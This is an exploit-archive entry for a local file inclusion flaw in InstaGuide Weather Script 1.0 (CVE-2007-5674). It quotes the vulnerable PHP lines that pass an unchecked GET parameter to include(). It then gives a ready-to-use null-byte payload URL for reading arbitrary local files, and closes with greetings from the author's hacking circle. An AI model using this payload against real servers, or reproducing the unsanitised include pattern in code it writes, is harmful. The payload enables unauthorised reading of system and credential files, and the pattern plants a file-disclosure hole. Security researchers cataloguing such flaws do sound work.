[] NeoSense

InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion

Author: h4ck3r
type: webapps
platform: php
port: 
date_added: 2007-10-21 
date_updated:  
verified: 1 
codes: OSVDB-38136;CVE-2007-5674 
tags: 
aliases:  
screenshot_url:  
application_url: 

Weather for PHP <= (PageName) Local File Include Vulnerability

Script : Weather for PHP

Version : 1.0

Download : http://www.instaguide.com/download/weather_free.zip

AUTHOR : BorN To K!LL

Vuln Code :

$PageName = $_GET['PageName'];     //// this is one ... :)

include("includes/content/$PageName.php")   //// this is two ... :)

Exploit :

[path]/index.php?PageName[Local File]%00

Greetings :

str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ...

BorN To K!LL <> Dr.2 = 4ever .... =D

# milw0rm.com [2007-10-22]